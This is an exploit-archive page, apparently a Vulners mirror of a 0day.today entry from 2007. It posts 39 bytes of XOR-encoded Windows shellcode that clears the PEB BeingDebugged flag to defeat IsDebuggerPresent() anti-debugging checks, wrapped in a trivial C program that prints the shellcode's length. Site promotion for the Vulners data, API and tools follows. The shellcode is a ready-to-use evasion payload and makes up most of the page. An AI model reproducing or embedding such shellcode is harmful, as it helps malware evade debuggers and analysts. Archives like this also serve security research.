Lucene search
K

win32 IsDebuggerPresent ShellCode (NT/XP) 39 bytes

🗓️ 31 May 2007 00:00:00Reported by ex-pbType 
zdt
 zdt
🔗 0day.today👁 26 Views

win32 IsDebuggerPresent ShellCode set PEB->BeingDebugged to 0 bypasses IsDebuggerPresent()/BeingDebugged check by ex-p

Code
==================================================
win32 IsDebuggerPresent ShellCode (NT/XP) 39 bytes
==================================================




/* Shellcode Length: 39 bytes  */
/* sets PEB->BeingDebugged to 0 */
/* IsDebuggerPresent()/BeingDebugged bypass */
/* by ex-pb @ [email protected] */
/* greets: xgx and all i forgot */

#include <stdio.h>
#include <windows.h>

char ShellCode[] = "\xEB"
"\x0F\x58\x80\x30\x95\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\xF1\x34\xA5\x95\x95\x95\xAB\x53\xD5\x97\x95\x56\x68\x61\x63\x6B\xCD";

int main()
{
	printf("Shellcode length: %d\n", strlen(ShellCode));
	return 0;
}



#  0day.today [2018-01-04]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

31 May 2007 00:00Current
7High risk
Vulners AI Score7
26